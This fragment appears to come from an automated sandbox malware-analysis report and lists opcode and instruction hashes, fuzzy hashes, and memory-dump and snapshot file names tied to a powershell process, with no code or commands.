                                                            • Opcode ID: 6cea6812482c70e410c2036b93f6f0fabc1fd3026d05f0cb02e6f9c5c39d1355
                                                            • Instruction ID: b7d71753ff926cf4069dc082d7d66a9f8650d9b14f53f9cac29378226d1ef840
                                                            • Opcode Fuzzy Hash: 6cea6812482c70e410c2036b93f6f0fabc1fd3026d05f0cb02e6f9c5c39d1355
                                                            • Instruction Fuzzy Hash: D041724BB4D7D21BE362473C68F62E63FD4EF5326570A10B7C6C5D6093AD4E28079262
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.4745123000.00007FFD34200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ffd34200000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a4b4cce3e4609b8fa51a7622ae00fb5a6a24e6980c1eed35b0dadf9b428b1408
                                                            • Instruction ID: fcd775879fdce8fdc5d5f598117eaa2c436a57a3b1df5426f108194892a81383
                                                            • Opcode Fuzzy Hash: a4b4cce3e4609b8fa51a7622ae00fb5a6a24e6980c1eed35b0dadf9b428b1408
                                                            • Instruction Fuzzy Hash: 5231E65BA0DAC20BE7129B3D58A50DB3BD2EF5336474990B2CF84DF043AE4E18079652